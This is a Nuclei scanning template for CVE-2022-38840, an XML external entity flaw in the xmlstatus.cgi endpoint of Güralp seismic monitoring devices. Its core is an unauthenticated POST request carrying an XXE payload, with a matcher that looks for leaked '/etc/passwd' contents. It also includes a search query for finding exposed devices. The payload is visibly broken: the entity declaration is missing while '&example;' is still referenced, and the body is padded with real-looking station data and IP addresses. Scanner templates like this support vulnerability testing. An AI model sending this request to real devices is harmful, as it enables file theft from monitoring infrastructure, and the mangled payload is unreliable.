id: CVE-2022-38840

info:
  name: Güralp MAN-EAM-0003 3.2.4 - XML External Entity (XXE)
  author: daffainfo
  severity: high
  description: |
    cgi-bin/xmlstatus.cgi in Güralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities in the xmlstatus.cgi component to read arbitrary files from the seismic monitoring system, potentially accessing sensitive configuration data and system credentials.
  remediation: |
    Update Güralp MAN-EAM-0003 to a version newer than 3.2.4 that disables external entity processing in XML parsers and validates uploaded XML files.
  reference:
    - https://www.exploit-db.com/exploits/51037
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38840
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-38840
    cwe-id: CWE-611
    epss-score: 0.60091
    epss-percentile: 0.98311
    cpe: cpe:2.3:a:guralp:man-eam-0003:3.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: guralp
    product: man-eam-0003
    google-query: "webconfig menu.cgi"
  tags: cve,cve2022,guralp,man-eam-0003,xxe,vkev,vuln

http:
  - raw:
      - |
        POST /cgi-bin/xmlstatus.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb84cALN1n8IDf7tQ

        ------WebKitFormBoundaryb84cALN1n8IDf7tQ
        Content-Disposition: form-data; name="xml_file"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundaryb84cALN1n8IDf7tQ
        Content-Disposition: form-data; name="xml_data"

        ]> false platinum 102 running GPS FLL 46196 true 2022-06-14T11:26:53Z 6.1e-08 running never 4.6% -0.3% -0.3% running never running never 11374055 331 1567 0 16 5 7338920142 213600 gdi2gcf[default] gdi-link-tx[default] gdi2miniseed[default] das-in das-in-textstatus DONB.HHZ.TM.00 DONB.HHN.TM.00 DONB.HHE.TM.00 DONB.HDF.TM.X0 DONB.HNZ.TM.10 DONB.HNN.TM.10 DONB.HNE.TM.10 DONB.MMZ.TM.00 DONB.MMN.TM.00 DONB.MME.TM.00
        DONB.SOH.TM.0 DONB-AIB DONB.SOH.TM.1 DONB-BIB DONB.SOH.TM.X DONB-XIB 11273973132 325518 1085.06 1565 0 7439096490 216516 11374055 331 100 DONB-AZ0 2022-06-14T11:26:46.000000000Z CMG-DAS 0 1 100 DONB-AN0 2022-06-14T11:26:46.000000000Z CMG-DAS 0 1 100 DONB-AE0 2022-06-14T11:26:45.000000000Z CMG-DAS 0 1 100 DONB-XX0 2022-06-14T11:26:35.000000000Z CMG-DAS 0 1 100 DONB-BZ0 2022-06-14T11:26:48.000000000Z CMG-DAS 0 1 100 DONB-BN0 2022-06-14T11:26:42.000000000Z CMG-DAS 0 1 100 DONB-BE0 2022-06-14T11:26:40.000000000Z CMG-DAS 0 1 4 DONB-AM8 2022-06-14T11:24:48.000000000Z CMG-DAS 0 4 DONB-AM9 2022-06-14T11:23:47.000000000Z CMG-DAS 0 4 DONB-AMA 2022-06-14T11:23:57.000000000Z CMG-DAS 0 nan DONB-A00 CMG-DAS 0 nan DONB-AIB CMG-DAS 0 nan DONB-B00 CMG-DAS 0 nan DONB-BIB CMG-DAS 0 nan DONB-X00 CMG-DAS 0 nan DONB-XIB CMG-DAS 0 6184483152 180000 0 0 22682743 655 true 2022-06-14T11:26:53Z 3D 2022-06-14T11:26:53Z 13.909917 100.593734 3 26 12 2022-06-14T11:26:52Z true direct_gps NTP is using a GPS reference source.
        true 0.000131 GPS 127.127.28.1 GPS 22682743 655 3382931 7 123.160.221.22 21100 false 0 113.53.234.98 33964 false 0 203.114.125.67 48666 false 3221351 113.53.234.98 45158 false 3382931 221.128.101.50 55776 false 3382931 118.175.2.50 60818 false 3382931 203.114.125.67 53984 false 3382931 Inactive Last flush good 2022-06-14T08:10:14Z 27.2% 17449811968 64134021120 VFAT DAS-405D62 10307538 1.72 437809152 77.0% &example; 15809 CMG-DAS 2021-04-08T05:06:17Z 2021-04-08T07:02:50Z 2021-04-08T08:00:33Z 2021-04-08T08:30:41Z 2021-04-08T08:39:15Z 2021-04-08T08:46:24Z 2021-04-08T10:08:51Z 2021-04-09T07:10:41Z 2021-10-07T06:48:35Z 2022-02-15T04:14:30Z 43.875 12.75 0.442 12.675 0.289 12.725 0.002
        ------WebKitFormBoundaryb84cALN1n8IDf7tQ
        Content-Disposition: form-data; name="upload_xml"

        Upload and view
        ------WebKitFormBoundaryb84cALN1n8IDf7tQ--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - "XML status"
          - "Software repository label"
          - "xmlstatus.cgi"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207babb5b4add72ce76ea2bdd5065d38e6d695e33949a259a627bac20ff9a9ff55022100937e70403b5e9241541d269917e304e609be99f16e9d0601bdfcf0efbedd12f2:922c64590222798bb761d5b6d8e72950